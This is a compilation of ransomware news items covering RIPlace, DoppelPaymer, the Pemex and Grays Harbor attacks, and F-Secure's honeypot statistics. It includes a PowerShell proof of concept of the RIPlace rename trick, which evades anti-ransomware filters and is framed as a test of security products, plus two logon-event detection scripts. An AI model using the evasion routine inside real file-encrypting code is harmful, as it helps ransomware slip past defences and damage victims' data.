A recently discovered technique allows ransomware to encrypt files on Windows-based systems without being detected by existing anti-ransomware products, Nyotron security researchers warn.
Dubbed RIPlace, the technique allows malware to bypass defenses using the legacy file system “rename” operation, and the security researchers say it is effective even against systems that are fully patched and run modern antivirus solutions.
RIPlace, the researchers say, can be used to alter files on any computers running Windows XP or newer versions of Microsoft’s operating system.
In a detailed report covering the findings (PDF), the researchers note that most ransomware operates by opening and reading the original file, encrypting the content in memory, and then destroying the original in one of three ways: writing the encrypted content back over it; saving the encrypted content to a new file and then erasing the original; or saving the encrypted file and then using Rename to replace the original with it.
When a rename request is issued (an IRP_MJ_SET_INFORMATION request with FileInformationClass set to FileRenameInformation), minifilter drivers registered for that operation receive a callback, and anti-ransomware products use that callback to decide whether the rename is legitimate.
What the researchers discovered was that, if DefineDosDevice (a legacy function that creates an MS-DOS device name, in effect a symbolic link in the object manager’s \?? namespace) is called before the rename, the caller can pass an arbitrary name as the device name along with the path of the original file as the target it points to, and then issue the rename against the DosDevice path instead of the real one.
The issue, they explain, is that the filter driver’s callback “fails to parse the destination path when using the common routine FltGetDestinationFileNameInformation.” The routine returns an error when handed a DosDevice path, but the rename call itself still succeeds, so a filter that treats that error as “nothing to inspect” lets the replacement of the original file go through unexamined.
“Using this technique, it is possible to maliciously encrypt files and bypass antivirus/anti-ransomware products that do not properly handle IRP_MJ_SET_INFORMATION callback. We believe that malicious actors may abuse this technique in order to bypass security products that rely on FltGetDestinationFileNameInformation routine as well as avoid any recording of such activity by EDR products,” the researchers explain.
The researchers discovered the technique in spring 2019 and have been in contact with Microsoft, security vendors, and law enforcement and regulatory authorities. Unfortunately, they say only a handful of security vendors have acknowledged a fix, despite dozens being impacted.
Nyotron published two videos demonstrating how RIPlace can bypass Symantec Endpoint Protection (SEP) and Microsoft Defender Antivirus (Defender AV) and also released a free tool that allows anyone to test their system and security products against the RIPlace evasion technique.
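The rename path described above can be exercised against files you own to see whether an endpoint product logs or blocks it. The harness below is an added example, not Nyotron’s tool or code: it creates an “original” file and a stand-in for the encrypted copy, points an MS-DOS device name at the original with DefineDosDevice, and then renames the stand-in onto the \\?\ form of that device name. The device name, the temp paths and the use of the \\?\ prefix for the destination are assumptions of this example.

```powershell
# Added example (not Nyotron's tool): exercise a RIPlace-style rename against files
# you own, then report whether the rename landed. Device name, temp paths and the
# \\?\ form of the destination are assumptions of this harness.
Add-Type -Namespace RIPlaceTest -Name Native -MemberDefinition @'
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern bool DefineDosDevice(uint dwFlags, string lpDeviceName, string lpTargetPath);

[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern bool MoveFileEx(string lpExistingFileName, string lpNewFileName, uint dwFlags);
'@

$DDD_REMOVE_DEFINITION     = 0x2
$MOVEFILE_REPLACE_EXISTING = 0x1

function Test-RIPlaceRename {
    param(
        [string]$DeviceName = "RIPlaceTest",                      # assumed, arbitrary name
        [string]$WorkDir    = (Join-Path $env:TEMP "riplace-test") # assumed scratch location
    )
    New-Item -ItemType Directory -Path $WorkDir -Force | Out-Null
    $original    = Join-Path $WorkDir "original.txt"
    $replacement = Join-Path $WorkDir "replacement.tmp"
    Set-Content -Path $original    -Value "ORIGINAL"    -NoNewline
    Set-Content -Path $replacement -Value "REPLACEMENT" -NoNewline   # stands in for the encrypted copy

    # Step 1: create \??\<DeviceName> pointing at the original file (a per-session DOS device,
    # no elevation needed). Without DDD_RAW_TARGET_PATH the Win32 path is converted for us.
    if (-not [RIPlaceTest.Native]::DefineDosDevice(0, $DeviceName, $original)) {
        throw "DefineDosDevice failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    try {
        # Step 2: rename the replacement onto the DosDevice path rather than the real path.
        # A filter that relies on FltGetDestinationFileNameInformation gets an error for this
        # destination; the rename itself still resolves through the symbolic link.
        $renamed = [RIPlaceTest.Native]::MoveFileEx($replacement, "\\?\$DeviceName", $MOVEFILE_REPLACE_EXISTING)
        $err     = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    } finally {
        # Remove the most recent definition of the device name so nothing dangles.
        [void][RIPlaceTest.Native]::DefineDosDevice($DDD_REMOVE_DEFINITION, $DeviceName, $null)
    }

    $content = if (Test-Path $original) { Get-Content -Path $original -Raw } else { "<missing>" }
    $verdict = if ($renamed -and $content -eq "REPLACEMENT") {
                   "Rename via DosDevice path went through: check whether your AV/EDR logged or blocked it"
               } elseif (-not $renamed) {
                   "Rename blocked or failed (Win32 error $err)"
               } else {
                   "Rename reported success but original unchanged: investigate"
               }
    [pscustomobject]@{
        RenameSucceeded  = $renamed
        Win32Error       = $err
        OriginalContents = $content
        Verdict          = $verdict
    }
}

Test-RIPlaceRename
```

Windows itself allows this rename, so a "went through" result is not by itself a bypass; the question the page raises is whether the product saw the rename as a write to the original file. Run it with the product’s activity log open and confirm that the replacement of original.txt was recorded (or blocked) under the real path.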
The DoppelPaymer ransomware spreads via existing Domain Admin credentials, not exploits targeting the BlueKeep vulnerability, Microsoft says.
The malware, which security researchers believe to have been involved in the recent attack on Mexican state-owned oil company Petróleos Mexicanos (Pemex), has been making the rounds since June 2019, with some earlier samples dated as far back as April 2019.
Initially detailed in July this year, DoppelPaymer is said to be a forked version of BitPaymer, likely the work of some members of the TA505 threat group (the group behind the Dridex banking trojan and the Locky ransomware) who decided to leave the cybercrime gang and start their own illegal operation.
In a new blog post, Dan West and Mary Jensen, both senior security program managers at Microsoft’s Security Response Center, explain that while DoppelPaymer represents a real threat to organizations, information on its spreading method is misleading.
Specifically, the tech company says that information regarding DoppelPaymer spreading across internal networks via Microsoft Teams and the Remote Desktop Protocol (RDP) vulnerability BlueKeep (CVE-2019-0708) is incorrect.
“Our security research teams have investigated and found no evidence to support these claims. In our investigations we found that the malware relies on remote human operators using existing Domain Admin credentials to spread across an enterprise network,” Microsoft’s researchers explain.
The company recommends that security administrators enforce good credential hygiene, apply the principle of least privilege, and implement network segmentation to keep their environments protected.
These best practices, Microsoft notes, can help prevent not only DoppelPaymer attacks, but also other malware from compromising networks, disabling security tools, and leveraging privileged credentials to steal or destroy data.
Microsoft, which has already included protection from DoppelPaymer and other malware in Windows Defender, says it will continue to enhance protections as new emerging threats are identified.
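An operator reusing Domain Admin credentials to move across an enterprise network leaves a trail of network and RDP logons by a handful of accounts on machines where those accounts have no business. The detection below is an added example, not Microsoft’s code: it takes logon records shaped like Security event 4624, keeps only network (type 3) and RemoteInteractive (type 10) logons by privileged accounts on hosts outside the admin tier, and scores accounts by how many distinct hosts they touched. The account names, the Tier 0 host list, the threshold and the sample events are constructed assumptions.

```powershell
# Added example (not Microsoft's guidance code): flag Domain Admin logons on hosts
# outside the admin tier. Event objects are constructed stand-ins for Security log
# 4624 records; account names, host lists and the threshold are assumptions.
$PrivilegedAccounts = @('CORP\da-jsmith', 'CORP\da-backup')   # assumed Domain Admins
$Tier0Hosts         = @('DC01', 'DC02', 'PAW01')                # assumed hosts where DA logons are expected
$NetworkLogonTypes  = @(3, 10)   # 3 = network (SMB/PsExec-style), 10 = RemoteInteractive (RDP)

function Get-SuspiciousPrivilegedLogons {
    param(
        [object[]]$Events,
        [string[]]$Privileged   = $PrivilegedAccounts,
        [string[]]$AllowedHosts = $Tier0Hosts,
        [int]$HostThreshold     = 2
    )
    $hits = $Events |
        Where-Object { $_.Id -eq 4624 -and $_.LogonType -in $NetworkLogonTypes } |
        Where-Object { ("$($_.Domain)\$($_.Account)") -in $Privileged } |
        Where-Object { $_.Computer.Split('.')[0] -notin $AllowedHosts }   # strip DNS suffix

    $hits | Group-Object { "$($_.Domain)\$($_.Account)" } | ForEach-Object {
        $hosts = @($_.Group.Computer | Sort-Object -Unique)
        [pscustomobject]@{
            Account       = $_.Name
            DistinctHosts = $hosts.Count
            Hosts         = ($hosts -join ',')
            Sources       = (@($_.Group.SourceIp | Sort-Object -Unique) -join ',')
            Severity      = if ($hosts.Count -ge $HostThreshold) {
                                'High: DA credential fanning out across non-Tier-0 hosts'
                            } else {
                                'Medium: DA logon outside Tier 0'
                            }
        }
    }
}

# Constructed sample: one DA account hopping across three member hosts from a single source,
# plus a normal DC logon and an unprivileged interactive logon that must not be flagged.
$sample = @(
    [pscustomobject]@{ Id=4624; LogonType=10; Domain='CORP'; Account='da-jsmith'; Computer='DC01.corp.local';    SourceIp='10.0.5.10' },
    [pscustomobject]@{ Id=4624; LogonType=3;  Domain='CORP'; Account='da-jsmith'; Computer='WKS-101.corp.local'; SourceIp='10.0.5.10' },
    [pscustomobject]@{ Id=4624; LogonType=3;  Domain='CORP'; Account='da-jsmith'; Computer='WKS-102.corp.local'; SourceIp='10.0.5.10' },
    [pscustomobject]@{ Id=4624; LogonType=10; Domain='CORP'; Account='da-jsmith'; Computer='FS01.corp.local';    SourceIp='10.0.5.10' },
    [pscustomobject]@{ Id=4624; LogonType=2;  Domain='CORP'; Account='jdoe';      Computer='WKS-103.corp.local'; SourceIp='-' }
)
Get-SuspiciousPrivilegedLogons -Events $sample | Format-Table -AutoSize
```

On a live system the same shape comes from `Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624}` with the TargetDomainName, TargetUserName, LogonType, IpAddress and Computer fields mapped onto the properties used here; feed it the real Domain Admins membership rather than a hard-coded list. The point is the least-privilege check Microsoft recommends in operational form: a Domain Admin credential that shows up on file servers and workstations is either a policy violation or an operator already inside.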
“Globally, ransomware continues to be one of the most popular revenue channels for cybercriminals as part of a post-compromise attack,” Microsoft warns.
Attackers, the company says, typically use social engineering to compromise enterprises. The practice involves tricking an employee to visit a malicious site or to open downloaded or emailed documents that drop malware onto their computers.
Mexican state-owned oil company Petróleos Mexicanos (Pemex) on Sunday suffered a ransomware attack that took down parts of its network.
The attack, the company claims, was quickly neutralized and affected less than 5% of the computers on its network.
In an attempt to stop any rumors related to the suffered attack, the company also pointed out that it is operating normally and that production, supply, and inventories of fuel were not impacted.
Pemex also notes that its internal network, “like all major national and international government and financial companies and institutions,” is frequently targeted in cyber-attacks.
The company did not provide specific information on the incident, but security researchers revealed on Twitter that the DoppelPaymer ransomware was involved.
The attackers apparently demanded a 565 BTC ($4.9 million) ransom to be paid, while also claiming that they gathered sensitive data from the Pemex network. The miscreants also threaten to share the allegedly stolen information publicly if the company does not pay the ransom.
Initially detailed in July this year, DoppelPaymer is a forked version of BitPaymer, a piece of ransomware reportedly built by TA505, the threat actor behind the infamous Dridex banking trojan and the Locky ransomware. DoppelPaymer, researchers say, is likely the work of members of TA505 that left the group to start their own operation.
DoppelPaymer, security researcher Vitali Kremez points out, is often dropped via an infection chain that starts with Emotet installing Dridex.
According to BleepingComputer, Pemex apparently did not try to contact the attackers regarding a possible payment.
Hackers infected Washington-based Grays Harbor Community Hospital and Harbor Medical Group (HMG) with ransomware and demanded a payment of $1 million to unlock patient files, according to a report from the Daily World.
The report sheds light on the EHR downtime the provider put into place after experiencing persistent issues with its EHR systems in June. Both the hospital and HMG’s clinics were impacted by the issues with its MEDITECH EHR, but officials did not explain the cause at the time.
According to the report, the hackers infected the computer systems with ransomware nearly two months ago when an employee clicked on a malicious link contained in a phishing email. The cyberattack began on a weekend when Grays Harbor IT staff was limited.
During the initial days, staff treated it as an IT issue and officials said servers were turned off the Monday after the attack to contain the infection. However, the ransomware had rapidly spread within the first days of the attack.
Grays Harbor clinics were hit harder by the attack, as the hospital’s older software prevented the ransomware from properly installing on the main system. The ransomware was more effective at the clinics, where medical records, prescriptions, and other functions are still down.
Patient records are still available at the hospital, while the clinics are still operating on paper. Officials stressed that patient care was not impacted, with surgeries, emergency care, and routine appointments continuing as scheduled.
But some appointments were delayed, and patients were asked to bring their prescriptions and other medical histories with them at the time of care. Additionally, Grays Harbor experienced a five-day period where payments could not be processed, which officials said was a large issue for the “cash-strapped” operation.
The money was not lost, but the timing and cash flow were problematic. Grays Harbor does have cyber insurance with a $1 million cap, which officials are hoping will cover the damage. Officials said the insurance company was the cause of the lack of transparency, as it was in charge of the response and investigation.
The situation is still ongoing, and officials have contacted the FBI to alert them to the security incident. The report did not explain whether the hospital paid the ransom. What’s more, about 85,000 patients are being notified that their data was compromised during the event, although officials said there is currently no evidence of disclosure.
Grays Harbor did have traditional anti-virus and backups in place before the ransomware attack, but even the backups were infected. Officials said they have not yet determined whether the missing records are permanently gone.
Officials are concerned about the ongoing attack, as just a year ago the hospital’s future was still in limbo given “crippling debt.” Ransomware causes some of the largest devastation of cyberattacks, with recent reports showing ransomware payments increased 184 percent during the second quarter of 2019. The average downtime lasts nearly 10 days.
Grays Harbor is just the latest provider to experience a long period of downtime due to ransomware. After falling victim to two ransomware attacks in the course of two months and experiencing nearly eight weeks of downtime, Kentucky-based Park DuValle Community Health Center paid hackers $70,000 to unlock its records.
It’s why so many ransomware victims choose to give in to hackers and pay the ransom – with the sum demanded in the biggest attacks amounting to hundreds of thousands of dollars, usually to be paid in Bitcoin or other cryptocurrency.
Cybersecurity researchers at F-Secure set up honeypots – decoy servers facing the internet designed to be appealing to hackers – to track cyberattacks and cyber-criminal activity during the first half of 2019.
The Attack Landscape H1 2019 report details what they found, and it shows that, when it comes to ransomware, brute force is the main infection vector, accounting for 31% of attempts to deliver file-encrypting attacks.
Brute force attacks see hackers attempt to compromise servers and endpoints by trying as many passwords as possible against an account, usually with the aid of bots, to see if any of them work against the target. Credential stuffing, often lumped in with brute force, instead replays username and password pairs leaked in earlier breaches. Both succeed because of the number of systems that use default credentials, extremely common passwords, or passwords reused across services.
“Plain and simply, brute-force attacks are the primary choice for hackers because it works, we’re seeing that there are an abundance of accounts that have way too many insecure and weak passwords – making it too easy for hackers to bypass them,” Jarno Niemela, principal researcher at F-Secure, told ZDNet.
Remote Desktop Protocol (RDP) attacks can also be conducted in this way, with attackers attempting to guess passwords in order to remotely gain control of internet-facing endpoints. It’s also possible for hackers to use underground forums to buy the usernames and passwords required to attack previously compromised endpoints.
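The two guessing styles above look different in a Security log: a brute-force run hammers one or two accounts with many passwords from one source, while password spraying or credential stuffing touches many accounts a few times each. The classifier below is an added example, not F-Secure’s code; it groups records shaped like failed-logon event 4625 by source address and labels each burst. The thresholds and the sample events are constructed assumptions.

```powershell
# Added example (not F-Secure's): classify failed-logon bursts per source IP as brute
# force (few accounts, many attempts) or password spray / credential stuffing (many
# accounts, few attempts each). Events are constructed stand-ins for Security log 4625
# records; the thresholds are assumptions to tune for your environment.
function Get-LogonAttackPattern {
    param(
        [object[]]$Events,
        [int]$MinAttempts           = 20,   # ignore sources below this many failures
        [int]$SprayAccountThreshold = 10    # distinct accounts that make a burst look like spraying
    )
    $Events | Where-Object { $_.Id -eq 4625 } | Group-Object SourceIp | ForEach-Object {
        $attempts = $_.Count
        if ($attempts -lt $MinAttempts) { return }          # skip this source, keep going
        $accounts   = @($_.Group.Account | Sort-Object -Unique)
        $perAccount = $attempts / $accounts.Count
        $times      = @($_.Group.Time | Sort-Object)
        $pattern = if ($accounts.Count -ge $SprayAccountThreshold -and $perAccount -le 3) {
                       'password spray / credential stuffing'
                   } elseif ($accounts.Count -le 2) {
                       'brute force'
                   } else {
                       'mixed guessing'
                   }
        [pscustomobject]@{
            SourceIp         = $_.Name
            Attempts         = $attempts
            DistinctAccounts = $accounts.Count
            Pattern          = $pattern
            Span             = $times[-1] - $times[0]
        }
    }
}

# Constructed sample: 30 guesses at 'administrator' from one address, 25 single guesses
# across 25 accounts from another, and one lone typo that should be ignored.
$now = Get-Date
$sample = @()
1..30 | ForEach-Object { $sample += [pscustomobject]@{ Id=4625; SourceIp='203.0.113.5';  Account='administrator'; Time=$now.AddSeconds($_) } }
1..25 | ForEach-Object { $sample += [pscustomobject]@{ Id=4625; SourceIp='198.51.100.7'; Account="user$_";        Time=$now.AddSeconds($_ * 2) } }
$sample += [pscustomobject]@{ Id=4625; SourceIp='10.0.0.9'; Account='jdoe'; Time=$now }
Get-LogonAttackPattern -Events $sample | Format-Table -AutoSize
```

For live data, `Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625}` supplies the IpAddress and TargetUserName fields to map onto SourceIp and Account. Note that with Network Level Authentication enabled, RDP password guessing is recorded as 4625 with logon type 3 rather than 10, so do not restrict an RDP-guessing rule to type 10.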
But despite the rise in brute force attacks, spam and phishing remains a highly common attack vector for ransomware: almost a quarter of the ransomware attacks targeting F-Secure honeypots looked to deliver ransomware via email.
All it can take for an attack to potentially compromise an entire network is for one user to download a malicious attachment – especially if the network is running unpatched software or doesn’t have anti-virus. GandCrab ransomware was commonly distributed by email during the first half of this year.
Other methods attackers are using in attempts to deliver ransomware include compromised firmware, fake software, malvertising and specially constructed exploit kits – toolboxes containing various exploits for attackers to take advantage of – with each of these accounting for around 10% of attempted attacks.
With the report finding that all forms of cyberattack are on the rise, it might sound like a cause for concern for organisations of all kinds and in all sectors. However, researchers note that, with a few simple techniques, organisations can help themselves to remain secure.